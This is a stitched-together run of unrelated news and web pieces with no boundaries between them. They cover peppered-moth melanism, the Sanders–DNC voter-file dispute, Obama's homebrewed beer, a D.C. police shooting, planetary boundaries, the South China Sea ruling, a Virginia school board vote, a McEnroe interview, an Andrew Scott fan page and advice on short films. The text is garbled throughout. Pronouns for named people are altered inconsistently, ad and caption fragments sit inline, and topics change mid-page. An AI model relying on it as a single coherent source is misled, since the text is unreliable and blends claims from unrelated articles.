In a pair of papers published in the journal Nature, scientists uncover how and when moths became black. One paper shows that the same gene that controls the black color also dictates color and patterns in butterflies. A second tracks that genetic variation back to 1819, just as Britain began burning coal on a wide scale to fuel its new industrial machines.
If you think that coal caused moths to mutate, think again. Rather than cause the black color mutation, the sooty conditions of the Industrial Revolution created the perfect backdrop for black moths to survive. As soot covered surfaces throughout Britain, black moths blended in with their background, escaping notice by predators and thriving. The survivors passed on their genes and, through the wonders of natural selection, became more and more common.
Ilik Saccheri, an evolutionary biologist with the University of Liverpool who led the research on the second paper, tells Smithsonian.com that finding the responsible gene was complicated. “When a mutation is transmitted through time, it's not transmitted on its own,” they say. They compare chromosomes to a bus that contains large numbers of passengers. Tiny mutations are passed along on a crowded “bus” that can make it hard to find the reason for a change in phenotype, or outward characteristics.
In this case, the team found that the mutation responsible for the moths' color was not to be found in the predictable place. Instead of being tucked away in the coding or regulatory sequences of the moths' genes, the mutation was hidden in its transposons. Also known as “jumping genes,” these DNA sequences copy and paste themselves throughout the genome and move, or jump, from one place in the genome to another.
Transposons used to be thought of as junk DNA and still aren't fully understood. They're only studied “by a few brave souls” today, says Saccheri, but they appear to have dramatically changed the appearance of the moths in this case.
Once Saccheri and their team figured out what they were looking for, they conducted a million simulations to track the mutation back to 1819—right when the Industrial Revolution started fueling sooty conditions in Britain. They estimate that the first mutation event likely took place at that time, but took about 30 years to become common enough to be noticed by observers. In 1848, a completely black version of the peppered moth was recorded in Manchester.
Though the discovery is important to geneticists, it's also valuable because it's so accessible. Peppered moths are so common that there's probably one near your house right now—and thanks to transposon mutations and natural selection, the moths in your neighborhood could further change color as industrialization morphs their environment.
“We're building evidence in support of that basic story,” says Saccheri. “You just can't make this up.”
Story highlights "the campaign has withdrawn its lawsuit against the DNC today but continues to implore the DNC to address the systemic instability that remains in its voter file system," the campaign said
"The Sanders campaign never "exported" any unauthorized voter file data," the campaign added
Washington (CNN) Bernie Sanders' campaign on Friday withdrew its lawsuit against the Democratic National Committee after claiming the party had unfairly blocked its access to a critical voter database in December.
The lawsuit came after a Sanders staffer exploited a software error to improperly access confidential voter information collected by Hillary Clinton's team. The DNC database is a goldmine of information about voters and being blocked from it threatened to complicate Sanders' outreach efforts just weeks before the Iowa caucuses. The incident also fueled a long-held belief in the Sanders camp and among their allies that the DNC was stacking the deck in favor of Clinton.
A DNC investigation, the results of which were also released Friday, concluded that the wrongdoing did not go beyond the four Sanders staffers who accessed the database and were fired soon after the incident came to light.
"With the investigation behind us, the campaign has withdrawn its lawsuit against the DNC today but continues to implore the DNC to address the systemic instability that remains in its voter file system," Sanders' campaign said in a statement.
The DNC agreed to restore the Sanders campaign's access to the database by the next day. The campaign agreed to cooperate in an independent investigation of the data breach and to pay a share of those costs.
Read More
Barack Obama Barack Hussein ObamaWith low birth rate, America needs future migrants 4 ways Hillary looms over the 2020 race Obama goes viral after sporting black bomber jacket with '44' on sleeve at basketball game MORE will go down in history as, among other things, the first president to brew their own beer in the White House.
The blog Obama Foodorama reported this week that the president's Super Bowl party featured a selection called "White House Honey Ale,” brewed right at 1600 Pennsylvania Ave.
ADVERTISEMENT
The blog said the president and first ladybought the equipment with their own funds (an aide did not specify when) in advance of serving it at the February gathering.The "honey" part of the beer comes from Michelle Obama's garden beehive. The beehive is also a White House first.Foodorama notes that Obama is the first president since George Washington to homebrew beer, and the very first to offer the brew at the White House. (Washington was a perennial self-brewer, the blog said, but he's the only president who didn't live in the White House.)The news sparked a small flurry in the blogosphere given that Obama, who has previously settled friendly bets between world leaders with beers like Goose Island's 312, had not shown a predilection for do-it-yourself beers. Obama settled a World Cup bet last summer with British Prime Minister David Cameron by giving their English counterpart a bottle of 312. And during 2009's so-called "beer summit" with Vice President, Henry Louis Gates Jr. and Massachusetts Police Sgt. James Crowley, Obama drank a Bud Light.Although the White House isn't ready to release the recipe yet, a spokesperson told Foodorama that “White House Honey Ale” isn't a one-time thing."It is very safe to assume that there will be more White House beer in the future," White House East Wing spokesperson Semonti Stephens said.
D.C. Police Chief Peter Newsham said they have asked the officer who shot and killed Terrence Sterling to resign. News4's Mark Segraves has the interview you will only see on News4. (Published Thursday, Aug. 10, 2017)
D.C.'s police chief is calling for one of their officers to step down after federal prosecutors decided not to charge the officer who shot and killed an unarmed black motorcyclist.
D.C. Police Officer Brian Trainer shot 31-year-old Terrence Sterling in northwest Washington Sept. 11, 2016.
On Wednesday, the U.S. Attorney's Office announced there was "insufficient evidence" to charge Trainer in Sterling's death. The announcement quickly led to protests and calls for the officer to resign -- including from D.C. Mayor Muriel Bowser.
D.C. Police Chief Peter Newsham said Thursday they have asked Trainer to resign.
"What I would say about a resignation is that when they are deciding whether or not to resign, they need to consider the family and the impact that this could potentially have on the city," Newsham told News4.
Bowser renewed their call for Trainer to step down Thursday, saying the public deserves accountability.
"I believe if there's no accountability in this incident that we break trust with our community," Bowser said at a news conference.
Following the decision by the U.S. Attorney's Office, the police department has 90 days to review the incident to see if department policies were violated.
"We have to focus on, really, what we can control here at MPD, and the two things that I can control right now is to make sure that we do a very complete and thorough investigation. That we get the Sterling family the answers to the questions that they have and to try to do that as quickly as possible," Newsham said.
D.C. Councilmember David Grosso, who has been critical of the police department in the pas, says Officer Trainer's actions the night they shot Sterling are cause for a bigger concern.
"I think they also need to dig a little deeper and see where the systemic problems are. These guys were trained MPD officers and chose to completely ignore the rules of MPD. So, how can that happen? Why does it happen? And further investigation into the full system needs to be done as well, not just the actions of these two guys, which was very inappropriate," Grosso said.
Humanity has raced past four of the boundaries keeping it hospitable to life, and we're inching close to the remaining five, an Earth resilience strategist has found.
In a paper published in Science in January 2015, Johan Rockström argues that we've already screwed up with regards to climate change, extinction of species, addition of phosphorus and nitrogen to the world's ecosystems and deforestation.
We are well within the boundaries for ocean acidification and freshwater use meanwhile, but cutting it fine with regards to emission of poisonous aerosols and stratospheric ozone depletion.
We'll tell you what's true. You can form your own view. From 15p €0.18 $0.18 $0.27 a day, more exclusives, analysis and extras.
"The planet has been our best friend by buffering our actions and showing its resilience," Rockström said. "But for the first time ever, we might shift the planet from friend to foe."
This table by Ted shows where we're at according to their scale:
Rockström came up with the boundaries in 2007, and since then the concentration of greenhouse gases in the atmosphere has risen to around 400 parts per million (the 'safe' boundary being 350 parts per million), risking high temperatures and sea levels, droughts and floods and other catastrophic climate problems.
The research echoes a recent debate over whether the Earth has moved from the Holocene epoch to a new one scientists are calling the Anthropocene, named after the substantial effect humankind has had on the Earth's crust.
It's not all doom and gloom though.
"Ours is a positive, not a doomsday, message," Rockström insisted.
Shape Created with Sketch. In pictures: Biggest threats to the rainforests Show all 10 left Created with Sketch. right Created with Sketch. Shape Created with Sketch. In pictures: Biggest threats to the rainforests 1/10 Borneo Destruction of the rainforest, deforestation in Borneo 2/10 Brazil Aerial view af an area devastated by clandestine gold mining in the Jamanxim National Forest, state of Para. With 1,3 million hectares, the Jamanxim National Forest is a microsm that replicates what happens in the Amazon, where thousands of hectares of land are prey of illegal woodcutters, stock breeders and gold miners 3/10 Amazon rainforest Intensive logging makes rainforest fires more likely as the Earth warms Rex 4/10 Peru Miners known as "Maraqueros" ready a rustic type of hydraulic jet known locally as a "Chupadera," after hauling the device about 16-meters deep into a crater at a gold mine process in La Pampa in Peru's Madre de Dios region. A new threat now looms for the estimated 20,000 wildcat miners who toil in huge scar of denuded rainforest known as La Pampa 5/10 Peru A rope hangs around the trunk of a tree at a illegal gold mining process in La Pampa in Peru's Madre de Dios region. An estimated 20,000 miners toil in this malarial expanse of denuded rainforest known as La Pampa 6/10 Amazon rainforest The extent of the environmental damage in the Amazon rainforest afp/getty images 7/10 Indonesia Destruction remains from tropical rainforest in Kuala Cenaku in Riau Province, Sumatra. Norway entered a partnership with Indonesia to support Indonesia's efforts to reduce emissions from deforestation and degradation of forests and peat lands. The business of pulp, palm oil and wood are causing the deforestation of Sumatra, the largest island owned by Indonesia, and is contributing global climate change to the extinction of many of the world's rare species 8/10 Malaysia An area that has been cleared of rainforest to make way for a palm oil plantation in Sabah, Malaysia CORBIS 9/10 Indonesia Regenerated palm oil trees are seen growing on the site of destroyed tropical rainforest in Kuala Cenaku GETTY IMAGES 10/10 Brazil Brazil launched the Amazon Fund, aimed at protecting the rainforest so vital to the world's climate, and at combating climate change. In December 2008 Brazil launched a national climate change plan which proposed to cut the country's deforestation rate in half by 2018 Getty Images 1/10 Borneo Destruction of the rainforest, deforestation in Borneo 2/10 Brazil Aerial view af an area devastated by clandestine gold mining in the Jamanxim National Forest, state of Para. With 1,3 million hectares, the Jamanxim National Forest is a microsm that replicates what happens in the Amazon, where thousands of hectares of land are prey of illegal woodcutters, stock breeders and gold miners 3/10 Amazon rainforest Intensive logging makes rainforest fires more likely as the Earth warms Rex 4/10 Peru Miners known as "Maraqueros" ready a rustic type of hydraulic jet known locally as a "Chupadera," after hauling the device about 16-meters deep into a crater at a gold mine process in La Pampa in Peru's Madre de Dios region. A new threat now looms for the estimated 20,000 wildcat miners who toil in huge scar of denuded rainforest known as La Pampa 5/10 Peru A rope hangs around the trunk of a tree at a illegal gold mining process in La Pampa in Peru's Madre de Dios region. An estimated 20,000 miners toil in this malarial expanse of denuded rainforest known as La Pampa 6/10 Amazon rainforest The extent of the environmental damage in the Amazon rainforest afp/getty images 7/10 Indonesia Destruction remains from tropical rainforest in Kuala Cenaku in Riau Province, Sumatra. Norway entered a partnership with Indonesia to support Indonesia's efforts to reduce emissions from deforestation and degradation of forests and peat lands. The business of pulp, palm oil and wood are causing the deforestation of Sumatra, the largest island owned by Indonesia, and is contributing global climate change to the extinction of many of the world's rare species 8/10 Malaysia An area that has been cleared of rainforest to make way for a palm oil plantation in Sabah, Malaysia CORBIS 9/10 Indonesia Regenerated palm oil trees are seen growing on the site of destroyed tropical rainforest in Kuala Cenaku GETTY IMAGES 10/10 Brazil Brazil launched the Amazon Fund, aimed at protecting the rainforest so vital to the world's climate, and at combating climate change. In December 2008 Brazil launched a national climate change plan which proposed to cut the country's deforestation rate in half by 2018 Getty Images
 They are confident that we can step back within some of the boundaries, for example through slashing carbon emissions and boosting agricultural yields in Africa to soothe deforestation and biodiversity loss.
"For the first time, we have a framework for growth, for eradicating poverty and hunger, and for improving health," they said.
We'll tell you what's true. You can form your own view.
At The Independent, no one tells us what to write. That's why, in an era of political lies and Brexit bias, more readers are turning to an independent source. Subscribe from just 15p a day for extra exclusives, events and ebooks – all with no ads.
Subscribe now
BEIJING/MANILA (Reuters) - China vowed to take all necessary measures to protect its sovereignty over the South China Sea and said it had the right to set up an air defense zone, after rejecting an international tribunal's ruling denying its claims to the energy-rich waters.
Chinese state media called the Permanent Court of Arbitration in the Hague a “puppet” of external forces after it ruled that China had breached the Philippines' sovereign rights by endangering its ships and fishing and oil projects.
Beijing has repeatedly blamed the United States for stirring up trouble in the South China Sea, where its territorial claims overlap in parts with Vietnam, the Philippines, Malaysia, Brunei and Taiwan.
“China will take all necessary measures to protect its territorial sovereignty and maritime rights and interests,” the ruling Communist Party's official People's Daily said in a front page commentary on Wednesday.
The case, covering a region that is home to one of the world's busiest trade routes, has been seen as a test of China's rising power and its economic and strategic rivalry with the United States.
Underscoring China's rebuffing of the ruling, state media said that two new airports in the Spratlys, on Mischief Reef and Subi Reef, both received test flights from civilian aircraft on Wednesday.
Beijing called the Philippines' claims of sovereignty in the South China Sea “baseless” and an “act of bad faith”. In a government white paper published on Wednesday, China also said its fishing boats had been harassed and attacked by the Philippines around the disputed Spratly Islands.
“On whether China will set up an air defense zone over the South China Sea, what we have to make clear first is that China has the right to... But whether we need one in the South China Sea depends on the level of threats we face,” Vice Foreign Minister Liu Zhenmin told reporters in Beijing, adding that China hoped to return to bilateral talks with Manila.
“We hope that other countries don't use this opportunity to threaten China, and hope that other countries can work hard with China, meet us halfway, and maintain the South China Sea's peace and stability and not turn the South China Sea into a source of war.”
U.S. officials have previously said they feared China may respond to the ruling by declaring an air defense identification zone in the South China Sea, as it did in the East China Sea in 2013, or by stepping up its building and fortification of artificial islands.
China's Liu also took aim at the judges on the tribunal, saying that as not one of them was Asian they could not possibly understand the issue and it was unfair of them to try.
COMPLICATED, UNCLEAR
The Philippines reacted cautiously to the ruling late on Tuesday, calling for “restraint and sobriety”, but the mood at President Rodrigo Duterte's cabinet meeting on Wednesday was “upbeat”, presidential spokesperson Ernesto Abella said.
Philippine Defence Secretary Delfin Lorenzana said they had spoken to U.S. counterpart Ash Carter ahead of the ruling who told them China had assured the United States it would exercise restraint, and the U.S. made the same assurance. Carter had sought and been given the same assurance from the Philippines, Lorenzana added.
“The ruling can serve as a foundation on which we can start the process of negotiations which hopefully will eventually lead to the peaceful settlement of the maritime dispute in the South China Sea,” Charles Jose, a spokesperson for the Philippines' Department of Foreign Affairs, said.
One of the lawyers who argued the Philippines' case said how and when the country would enforce the tribunal's ruling was complicated.
“There's no timeline for this game. It might have an extended period of gestation,” said Florin Ternal Hilbay, a former solicitor general. “I would assume our diplomats have read the decision and understand the complexities and consequences of enforcing the decision.”
Global intelligence firm Stratfor said fishermen from China or the Philippines were the greatest potential disruptors in the region, beyond the easy control of law enforcement.
Demonstrators display a part of a fishing boat with anti-China protest signs during a rally by different activist groups over the South China Sea disputes, outside the Chinese Consulate in Makati City, Metro Manila, Philippines July 12, 2016. REUTERS/Erik De Castrby
“The greatest struggle for both countries will be to rein them in, preferably before they get to sea, lest they disrupt the delicate peace,” Stratfor said in a note.
In moves likely to antagonize Beijing, the coastguards of Japan and the Philippines took part in simulated rescue and medical response exercises off Manila Bay on Wednesday, part of what the two countries have called efforts to improve maritime security and combat crime and piracy.
Japan and China are involved in a separate territorial dispute in the East China Sea and Beijing has warned Tokyo against meddling in the South China Sea dispute.
PIVOT PRESSURE
Beijing's ambassador to the United States earlier blamed the rise in tension in the region on the United States' “pivot” toward Asia in the past few years. Cui Tiankai said the arbitration case “will probably open the door of abusing arbitration procedures.
“It will certainly undermine and weaken the motivation of states to engage in negotiations and consultations for solving their disputes,” Cui said at a forum of the Center for Strategic and International Studies (CSIS) in Washington. “It will certainly intensify conflict and even confrontation.”
South Korea on Wednesday announced the planned location of a U.S. THAAD anti-missile defense unit against North Korea's missile and nuclear threats, a system that has angered China and prompted a North Korean warning of retaliation.
President Barack Obama's top Asia policy adviser, Daniel Kritenbrink, said the United States had no interest in stirring tensions in the South China Sea as a pretext for involvement in the region.
“We have an enduring interest in seeing territorial and maritime disputes in the Asia Pacific, including in the South China Sea, resolved peacefully, without coercion and in a manner that is consistent with international law,” Kritenbrink said at the same forum.
Taiwan President Tsai Ing-wen boarded a navy frigate in southern Taiwan ahead of its departure for the South China Sea early on Wednesday, a regular patrol pushed forward due to the Hague decision, which Taipei rejected.
Slideshow (8 Images)
“This patrol mission is to show the determination of the Taiwan people to defend our national interest,” Tsai said from the warship.
China considers self-ruled Taiwan a breakaway province to be united with the mainland eventually, and by force if necessary.
Another Virginia school board has declined to move forward with policies that would affirm protections for LGBT students or employees, citing the unsettled law and changes President Trump's administration could bring.
The Loudoun County School Board earlier this month voted down two measures that would have clarified that employees are protected from discrimination and harassment based on sexual orientation and gender identity.
The school system is the third in Northern Virginia to delay or decline to add LGBT protections, pointing to pending litigation that has left the law unclear, including a lawsuit before the U.S. Supreme Court in which a transgender boy sued a Virginia school board for the right to use the boys' bathroom. Another case, which the Virginia Supreme Court is slated to hear, challenges a Fairfax County School Board decision to add gender identity and sexual orientation to its nondiscrimination policy.
[Supreme Court takes up school bathroom rules for transgender students]
The Fairfax County School Board halted an effort to add regulations to its anti-discrimination policy in July to sort out legal issues regarding the regulations. The Prince William County School Board voted in September to postpone a vote on a measure to extend protections to transgender students and staff until June 2017.
The two proposals voted down in Loudoun included one that would have amended the equal employment opportunity policy, spelling out that the school system does not discriminate against qualified job applicants on the basis of sexual orientation and gender identity. A second would have added language to the school system's anti-harassment policy for employees, specifying that employees are barred from harassing their colleagues on the basis of sexual orientation and gender identity. Five of nine board members opposed the first proposal; six of nine opposed the second.
Instead, the board voted unanimously to add language to its equal employment opportunity policy, emphasizing that it “values merit and excellence in its workforce” and “encourages diversity in its workforce.”
School board members in support of the proposals said LGBT employees in the D.C. suburb sometimes worry about coming out to their colleagues for fear of retribution and that the language would assure those interested in teaching in the district that they would not face discrimination.
“They can't have pictures of their spouses and their families on their desk because of fear of retaliation and retribution,” said Brenda Sheridan (Sterling), the board's vice chairperson. “It is about assuring that when people come to work they are safe and protected.”
But opponents of the measure are skeptical that gay and transgender employees face discrimination and wondered about the necessity of the policy.
“We're not living in the 1950s,” said board chairperson Jeff Morse (Dulles). “Our society has become very much more accepting of all people, of all nationalities, of all creeds.”
Board member Eric DeKenipp (Catoctin) said they worry that the protections could lead the school district to allow transgender students to use bathrooms and locker rooms that align with their gender identity, which they believe is a violation of student privacy.
They cautioned that the Trump administration could remove guidance issued by the Obama administration, like the “Dear Colleague” letter issued in 2016 that clarified that Title IX protects transgender students from bullying. That letter was used to justify the proposed changes.
“The reality is we have a new secretary of education coming in, and this policy or this ‘Dear Colleague' letter is likely to be rescinded in the near term, when the new administration comes into office,” DeKenipp said.
Other board members believe the board lacks the authority to extend the protection, despite an opinion issued by state Attorney General Mark R. Herring (D) in 2015, which explicitly gave school boards the authority to add sexual orientation and gender identity to their nondiscrimination policies. The lawsuit against Fairfax County Public Schools is challenging that position.
[Va. school boards' anti-discrimination stands can mention sexual orientation]
Board members fear that adopting the policies could open the board up to lawsuits. DeKenipp said the board should “punt and delay our policies until the Supreme Court decisions are made.”
“We will end up in court for exceeding our authority,” they said.
Board member Joy Maloney (Broad Run) said they hope to see the school board take a stand in favor of protecting transgender and gay employees.
“We need people to stand up, not to punt, as allies,” Maloney said.
NEW YORK -- John McEnroe wants more anger in tennis.
Not the kind of racket-smashing, profanity-flying tantrums they threw as a player, when they could go from the sport's best player to its baddest boy in the same service game.
They want to see players get fed up that they can't break through against Roger Federer and Rafael Nadal, that they remain stuck behind Novak Djokovic and Andy Murray heading into Wimbledon.
"Those are the two greatest players that ever played in my opinion right now, Nadal and Federer, but I'm amazed that guys aren't hungrier or angrier about sort of their lack of success," McEnroe said. "I mean, these guys are tremendous and better than the guys for the most part, but not every single day. You've got to come at these guys with everything you've got."
That helped fuel McEnroe's rise to the top of tennis. While they say he's always had a good relationship with Bjorn Borg, whom they consider probably their greatest rival, the hatred of losing to Jimmy Connors and Ivan Lendl lasted from the center court at Grand Slams to the locker room during senior exhibitions.
John McEnroe was known for their fiery temper during their playing days, and he'd like to see the players of today harness that type of emotion for matches against the big four of Novak Djokovic, Andy Murray, Rafael Nadal and Roger Federer. AP Photo/Peter Kemp
They think players now might get along too well with Federer, who won their record 18th Grand Slam at the Australian Open, or be too in awe of Nadal, who added their 15th at the French Open.
"And you don't have to, like, disparage a guy," McEnroe said, "you've just got to have this hunger and will to try to -- when I played Connors for example, I tried to get myself to think like, 'Am I trying as hard as this guy, do I want it as bad as him?' And most of the time it feels like it wasn't, but I tried to and it feels like that's what you've got to do against these guys.
"You've got to bring everything you've got every single point or else they'll just walk all over you, and it seems like a lot of the guys have, to some extent, have let that happen."
Life after their tour career is the focus of McEnroe's new book, "But Seriously," in which they detail the ups and downs of their many roles outside of tennis: frustrated actor, amateur musician, art collector, remarried husband, proud parent. They still play some, but without the interest level in the U.S. to really do a senior tour right, they know that at age 58, he's close to that ending.
"When I feel pretty good, like there are certain days, one out of three days, where I'll feel pretty good physically and that elevates my game," McEnroe said. "I try to feel good every time, but it doesn't work out that way where things start clicking. So that's something that's more fleeting and frustrating, so that's why, I mean that's why you walk away from the sport in the first place. I didn't feel like I could win a major anymore, so I just didn't feel like I could keep playing, or that I wanted to keep playing when I really felt like I had no chance of winning."
They were only 25 when they won the last of their seven majors. He's since found entertainment opportunities through their friends on both coasts, though the game show and talk show they hosted were both short-lived. He's stayed involved in tennis as a commentator, through their John McEnroe Tennis Academy in New York and a little coaching, helping guide Canadian Milos Raonic to the Wimbledon final last year.
Perhaps their own career would have been different had they played now. The top four on the men's side are all 30 or over, and none is slowing down the way players did at that age when McEnroe played.
"They've got way more knowledge of how to recover, what to eat, how to train off the court as well as on the court, all those things," McEnroe said. "It's not like we had no idea, but it's almost like a science now, so from that standpoint there's no question I feel like I'd be different.
"And then the other obvious one, the amount of energy I wasted sort of complaining online calls or whatever it is. They have this challenge system, so that's sort of taken that out of the equation, so I think I would have been a 20 percent better player but probably quite a bit, even more than maybe 40 percent more boring, because you wouldn't have had that whole thing."
But they now appreciate their playing career more, as whatever frustrations he's had in other pursuits in the years since have given them a perspective they didn't have then.
"I don't think there's anything you do when you fail at it that you're happy when it happens. I think the key is always to sort of learn from it," they said. "If it helps you find your way or you head in a direction that's better served, it's OK."
Welcome to andrewscottt. This page will provide you with all kind of news and information involving Andrew Scott. For more information on where you can find what you're looking for, please have a look at the links above or read the About page! If you have any questions or remarks, don't hesitate sending a message!
HAMLET
Role: Hamlet
Dates: 09/06 - 02/09
Status: On now @ Harold Pinter Theatre
Ghost / Devil
Acting / Madness
Be / Not be
COGNITION
Role: Elias
Release date: Fall 2017
Status: Post-production
We journey through the symbolic landscape of the subconscious mind as we follow the story of an unbreakable bond between father and son. A bond that transcends SPACE AND TIME.
STEEL COUNTRY
Role: TBA (Possibly Donald)
Release date: TBA
Status: Post-production
When a young boy goes missing in a sleepy backwoods town, a local sanitation truck driver, Donald, plays detective, embarking on a precarious and obsessive investigation.
Hamlet09/06 - 02/09On now @ Harold Pinter TheatreGhost / DevilActing / MadnessBe / Not beEliasFall 2017Post-productionWe journey through the symbolic landscape of the subconscious mind as we follow the story of an unbreakable bond between father and son. A bond that transcends SPACE AND TIME.TBA (Possibly Donald)TBAPost-productionWhen a young boy goes missing in a sleepy backwoods town, a local sanitation truck driver, Donald, plays detective, embarking on a precarious and obsessive investigation.
So, you've made a short film. You've toiled and sacrificed. You've crowd-sourced and shed cinematic blood, sweat, and tears. You've begun the arduous and confusing process of submitting your masterwork to film festivals around the world. And, well, after waiting impatiently for several months, it seems nobody wants to screen it. It's not getting the overwhelming acceptance you thought it would. What went wrong?
We get this question a lot. We here at Short of the Week screen a lot of short films—many, many thousands—some we find organically on the web and many more that are submitted to us every year. We watch so many films that the common mistakes that might otherwise go unnoticed, become giant red flags. Some of these mistakes are small and easily remedied. Others are deeply ingrained in more profound creative components such as narrative, structure, and theme. But all of them are avoidable if you know what to look for.
Now, a brief disclaimer: Every film is different, and in film as in art, rules are made to be broken—tastes among curators vary and there are always films that prove the exception.
1. Your Film is Too Long
This one is rather obvious. It's called a “short” for a reason, right? Well, the issue is that most young filmmakers approach making a short with the structural lessons they've learned from watching features and long-form television. The result is a film that lacks the punch of an effective short and is also missing the depth of a feature. The pace feels wrong. And, online, where attention spans are so short, most have trouble finding an audience. Many offline festivals are going to balk at your long film too. Purely on a logistical level, 30 minute shorts are notoriously hard to program. A festival would much rather screen 3 x 10 minute shorts than your 27 minute film. As always, there are exceptions (we have a “long short” collection on this site after all). But, we'd offer the following aphorism that has been attributed to a plethora of historical figures: “If I had more time I would have written you a shorter letter.”
Check out Alexander Engel's This Is It for a fast, condensed narrative.
2. Your Film Starts Too Slow
A short film (especially online) needs to hook a viewer fast and early. Seems simple, right? You'd be surprised how often short films forget this.
As a curator for a major online platform states, “In the context of having any desire for digital distribution, a slow or opaque beginning is mistake number one. (Opaqueness and intrigue/mystery are very different things. The latter is a good thing.) Conversely, don't be proud, think about how your film will hook your audience in the first five seconds.”
You hear that aspiring filmmaker? You have five seconds! Which brings us to our next cinema sin…
3. Your Film Has Opening Credits
Nothing makes us want to eject from a short film faster than when it starts with a long opening credits sequence—we don't care how cool those credits looks. This may sound harsh, but unless you've got a big name in the cast, nobody cares who was in your film, who made it, and who did the production design. Granted, we know a lot of people worked really hard on your film and they deserve credit. But stick those accolades and Kickstarter backers where they belong—in a brief sequence at the end of the film. And we do mean brief. Don't artificially pad the runtime of your film with an elongated slow credit crawl. This is the kiss of death for an online short because it can make your film appear 2 minutes longer than it actually is. And, to online audiences, two minutes is an eternity.
4. Your Film Has Bad Sound
As camera technology gets better and better, the barrier to making your film look professional is getting lower and lower. Honestly, most footage shot today looks pretty darn good. But, forget the shallow depth of field and highlight control, and ask yourself: Does my film “sound” independent? Sound is the one technical aspect of short films today that is most often overlooked. Aspiring young directors obsess over cool camera angles and elaborately blocked shots, but, in doing so, they often give short shrift to the audio department. Sound is also incredibly important. It's the thing people will notice only if it's bad. Bad sound is distracting—it pulls the viewer out of the moment. This is especially true if a film is dialogue driven. We want to hear your characters speak, not the ambient sound of the room they're standing in.
5. Your Film Has Bad Acting
Seems obvious enough. Bad acting will sink a film no matter how interesting the concept. But, poor acting goes beyond just a weak performance. It extends to “miscasting” as well. Something that is all too common in short films. One tell-tale clue that you're watching a student film is that all the actors in it are 16-24 years-old. Many amateur filmmakers cast young people (i.e. their friends) in experienced character roles. The aging hitman? The world-weary waiter? Unless they have the transformative power of Daniel Day Lewis, someone in their 20s just can't play those characters convincingly. Good acting starts with good casting.
6. Your Film Lacks Originality
Grief. Depression. Suicide. Hitmen. Post-apocalyptic wastelands. Zombies. There are a slew of story clichés, tropes, and settings out there—unless you're planning on doing something different with established trope, avoid them. To be succinct: don't make a film that looks and feels exactly like other films you already enjoy. If you've already seen these movies, chances are we have too. Either take a framework and expand upon it, or go in a completely different direction. I beg of you… please… not another movie about a Hitman who just wants to feel a connection with someone.
I also want to to single out films about loss or grief. While there are definitely exceptions, films that tackle these heavy topics frequently stumble. It's a common miscalculation, especially by young filmmakers, to assume that watching people act sad is inherently interesting and dramatic. Well, after screening a figurative lifetime of student films featuring characters staring aimlessly at a wall, let me tell you, it isn't. Things like grief and depression are dramatic when they're part of what defines a character, not the driving force of a plot or story.
7. Your Film is Black and White For No Reason
This is a huge pet peeve of ours and several other high profile curators. We get it… you're “artsy.” But, don't make your film black and white just to prove that you've seen classic films. If you're going to opt for a certain visual style, make sure there is a clear motivation for it—a definitive artistic reason. This could be attributed to other stylistic ticks as well. Some of the biggest offenders are the “fake” silent film or the film noir parody. Both these styles are really overplayed, especially by first time filmmakers. Got that, gumshoe?
8. Your Characters Are Boring
If your characters are doing things just because the plot dictates it, that's a problem. This is common in a lot of “high-concept” films that never quite make it past the ingenuity of the premise. Yeah, you may have a cool sci-fi idea, but you have to make us care about the people we're watching on screen too.
9. Your Film has Interesting Characters, but they Don't Do Anything
The converse of the above is also true. We see a lot of short films that do the hard work of creating interesting characters and unique milieus, but then nothing really happens. It may sound like basic story 101, but you need to challenge your characters and make them uncomfortable. Safe is boring. While short films have the luxury of not wrapping up their narratives in a neat fashion, they still need to show change and an emotional arc. They need to give their characters challenges to overcome.
10. Your Film Was More Satisfying to Make than it Was to Watch
Okay. This is a tricky one to quantify and warrants some explaining. The desire to create something can be immense: filmmakers, after all, want to make films. And, so, in making a film, they can't separate the process itself from the final product. To them, they see a story with a beginning, middle, and end—they see something that started as an idea on paper and made its way to the screen. They are attached to that personal journey, and in turn, are satisfied with where they ended up. But, an unbiased viewer, has no attachments, and thus they only can see the final product. The meta-narrative of how something is made is completely lost on those not involved. This goes into a larger point about objectivity. Yes, your film might be your baby. But, for everyone else, it's just someone else's kid. Learning to receive and accept unbiased feedback is one of the most important things a burgeoning filmmaker can do to aid their cinematic growth.
11. Your Film is Good Considering…
Made your film for $20? Shot it on an iPhone? All your actors volunteered their time? Guess what… no one really cares. I know that sounds harsh, but programmers don't care about what hurdles you faced in realizing your creative vision. You can spend a week or 5 years on your film. All that matters is the end result. Further, highlighting any significant compromises you made can actually undersell your film and hurt your chances.
12. You Made Your Film in 48 Hours
Ever since the early aughts, “speed film festivals” have been really popular. And, it's easy to see why—they're a fun way to get together with your friends and actually make a finished product. But, very rarely do these quick turnaround films produce genuinely good movies. Again, there are always exceptions, but as a general rule of thumb, the more time you spend in pre-production, the better your film ends up being. 48-Hour Film contests are a great way to learn how to make films. Just don't expect the end result to be a masterpiece.
13. You Didn't Watch Other Short Films
This may shock you, but there are short filmmakers out there who don't bother watching other short films. They may watch tons of feature films and television shows, but spend scant time exploring the medium and format they're striving to create. This is akin to a sculptor who only researches oil paintings. If you're planning to make a short film, you need to watch other short films—especially successful ones that are similar in the tone and style to your project. After all, everything is remix—we can only learn and grow by observing and adapting from others. Watch good and bad films. Decide what works and what doesn't—what you like and don't like. You've got no excuse—there's an endless catalog of 3000 of the best short films right in front of you!
14. You List Meaningless Laurels
A red flag goes up when a film sent our way has a thumbnail image plastered with a dozen festival laurels that we've never heard of (or, even worse, the font is too small to make out the festival name). This happens more often than you think. Festivals can be great events, but not all festivals are created equal. As short film curators, we are pretty savvy on which festivals are the most prestigious. So, you're not fooling us when you say you won “Best film at the Southwest Regional Lake Minnetonka Dance Film Festival.” Don't overstate the importance of your festival pedigree, and we'll respect the honesty rather than the attempt at self-importance. If you're unsure of whether or not to include a laurel, take a look at this list of Academy Award qualifying festivals.
Now, a special note: One of the biggest red flags you can raise for programmers is listing Cannes on your list of festivals when your film was actually at the Cannes Short Film Corner. There are only 10 short films accepted into the Cannes competition each year, and we (as well as most programmers) know them all. Everything else is part of the Cannes Short Film Corner (which is a paid film market, not a competition). Listing the Cannes Short Film Corner in your laurels is effectively admitting that you know nothing. For a deeper dive on this, check out this anonymous piece on the subject.
15. You Made a Bland Profile Documentary
Documentaries can be powerful cinematic experiences. But, over the past few years, we've seen a flood of short “profile” documentaries flood the internet. You know the type: lots of ambient music, voiceover, and pretty b-roll about some artist with a quirky or odd hobby. These films all sort of feel the same to us. And, most lack a narrative arc to really stand out. We're not saying you can't make a good portrait doc. Rather, we're saying that it's now much harder to stand out.
But, don't just take our word for it—Claudette Godfrey, a short film curator for SXSW, articulated a similar point in an interview with the American Statesman:
